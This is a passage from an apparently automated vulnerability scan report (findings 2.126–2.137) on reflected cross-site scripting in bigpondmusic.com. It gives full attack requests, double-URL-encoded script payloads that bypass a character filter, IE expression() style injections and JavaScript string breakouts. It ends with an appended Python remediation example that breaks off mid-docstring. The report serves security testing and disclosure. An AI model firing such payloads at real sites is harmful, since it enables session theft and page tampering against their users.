Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 130253


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Powderfinger - Fingerprints
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000?8a6a7"style="x:expression(alert(1))"e1cd885fe90=1" />
...[SNIP]...

2.126. http://bigpondmusic.com/album/rascal-flatts/nothing-like-this [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rascal-flatts/nothing-like-this

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aa2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e40c385453a8 was submitted in the REST URL parameter 1. This input was echoed as 9aa2b"><script>alert(1)</script>40c385453a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album9aa2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e40c385453a8/rascal-flatts/nothing-like-this HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88467


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album9aa2b"><script>alert(1)</script>40c385453a8/rascal-flatts/nothing-like-this" />
...[SNIP]...

2.127. http://bigpondmusic.com/album/rascal-flatts/nothing-like-this [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/rascal-flatts/nothing-like-this

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab7f7'%3b75a2a29d0bb was submitted in the REST URL parameter 1. This input was echoed as ab7f7';75a2a29d0bb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumab7f7'%3b75a2a29d0bb/rascal-flatts/nothing-like-this HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87847


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumab7f7';75a2a29d0bb';
   s.prop4 = 'rascal-flatts';
   s.prop5 = 'nothing-like-this';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s
...[SNIP]...

2.128. http://bigpondmusic.com/album/rascal-flatts/nothing-like-this [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rascal-flatts/nothing-like-this

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69564"style%3d"x%3aexpression(alert(1))"a3c04abb6ce was submitted in the h parameter. This input was echoed as 69564"style="x:expression(alert(1))"a3c04abb6ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/rascal-flatts/nothing-like-this?h=76868968769564"style%3d"x%3aexpression(alert(1))"a3c04abb6ce HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 121041


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Rascal Flatts - Nothing Like
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/rascal-flatts/nothing-like-this?h=76868968769564"style="x:expression(alert(1))"a3c04abb6ce" />
...[SNIP]...

2.129. http://bigpondmusic.com/album/rascal-flatts/nothing-like-this [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rascal-flatts/nothing-like-this

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb486"style%3d"x%3aexpression(alert(1))"1f6f0212f93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fb486"style="x:expression(alert(1))"1f6f0212f93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/rascal-flatts/nothing-like-this?fb486"style%3d"x%3aexpression(alert(1))"1f6f0212f93=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 121111


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Rascal Flatts - Nothing Like
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/rascal-flatts/nothing-like-this?fb486"style="x:expression(alert(1))"1f6f0212f93=1" />
...[SNIP]...

2.130. http://bigpondmusic.com/album/rihanna/loud6 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rihanna/loud6

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8e4f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35d45e20369 was submitted in the REST URL parameter 1. This input was echoed as c8e4f"><script>alert(1)</script>35d45e20369 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumc8e4f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35d45e20369/rihanna/loud6 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:21:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87914


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumc8e4f"><script>alert(1)</script>35d45e20369/rihanna/loud6" />
...[SNIP]...

2.131. http://bigpondmusic.com/album/rihanna/loud6 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/rihanna/loud6

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8987c'%3b2e62406d5a3 was submitted in the REST URL parameter 1. This input was echoed as 8987c';2e62406d5a3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album8987c'%3b2e62406d5a3/rihanna/loud6 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:21:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87974


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album8987c';2e62406d5a3';
   s.prop4 = 'rihanna';
   s.prop5 = 'loud6';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.c
...[SNIP]...

2.132. http://bigpondmusic.com/album/rihanna/loud6 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rihanna/loud6

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eb56"style%3d"x%3aexpression(alert(1))"b49ea62020f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4eb56"style="x:expression(alert(1))"b49ea62020f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/rihanna/loud6?4eb56"style%3d"x%3aexpression(alert(1))"b49ea62020f=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 117450


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Rihanna - Loud - BigPond Mus
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/rihanna/loud6?4eb56"style="x:expression(alert(1))"b49ea62020f=1" />
...[SNIP]...

2.133. http://bigpondmusic.com/album/rihanna/only-girl-in-the-world [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rihanna/only-girl-in-the-world

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16411%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c9e03e38ac was submitted in the REST URL parameter 1. This input was echoed as 16411"><script>alert(1)</script>6c9e03e38ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album16411%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c9e03e38ac/rihanna/only-girl-in-the-world HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:21:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88233


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album16411"><script>alert(1)</script>6c9e03e38ac/rihanna/only-girl-in-the-world" />
...[SNIP]...

2.134. http://bigpondmusic.com/album/rihanna/only-girl-in-the-world [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/rihanna/only-girl-in-the-world

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae660'%3b66a4ff2fd7f was submitted in the REST URL parameter 1. This input was echoed as ae660';66a4ff2fd7f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumae660'%3b66a4ff2fd7f/rihanna/only-girl-in-the-world HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:21:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87914


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumae660';66a4ff2fd7f';
   s.prop4 = 'rihanna';
   s.prop5 = 'only-girl-in-the-world';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.
...[SNIP]...

2.135. http://bigpondmusic.com/album/rihanna/only-girl-in-the-world [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rihanna/only-girl-in-the-world

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77629"style%3d"x%3aexpression(alert(1))"90366360b68 was submitted in the h parameter. This input was echoed as 77629"style="x:expression(alert(1))"90366360b68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/rihanna/only-girl-in-the-world?h=73335586477629"style%3d"x%3aexpression(alert(1))"90366360b68 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 103890


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Rihanna - Only Girl (In The
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/rihanna/only-girl-in-the-world?h=73335586477629"style="x:expression(alert(1))"90366360b68" />
...[SNIP]...

2.136. http://bigpondmusic.com/album/rihanna/only-girl-in-the-world [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rihanna/only-girl-in-the-world

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c081b"style%3d"x%3aexpression(alert(1))"d068e88c9dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c081b"style="x:expression(alert(1))"d068e88c9dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/rihanna/only-girl-in-the-world?c081b"style%3d"x%3aexpression(alert(1))"d068e88c9dc=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 103894


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Rihanna - Only Girl (In The
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/rihanna/only-girl-in-the-world?c081b"style="x:expression(alert(1))"d068e88c9dc=1" />
...[SNIP]...

2.137. http://bigpondmusic.com/album/susan-boyle/the-gift11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/susan-boyle/the-gift11

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c46a2'%3b0a91471649d was submitted in the REST URL parameter 1. This input was echoed as c46a2';0a91471649d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
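The response below shows the sink: the first path segment lands in an inline SiteCatalyst call, s.channel = '...';, between single quotes and unescaped, so a single quote in the segment ends the literal and the rest of the segment is parsed as code. The following is an added example, not code from the Burp report or from bigpondmusic.com: a Python stand-in for that view showing the observed rendering next to a safe one (JSON string literal with < > & additionally escaped so the data can never contain a literal </script>), plus a small reader that checks whether the rendered output keeps the data inside the string. Function names are invented.

```python
"""Script-context injection via the first path segment (added example)."""
import json


def render_channel_vulnerable(segment: str) -> str:
    """Observed behaviour: the segment is dropped between single quotes with
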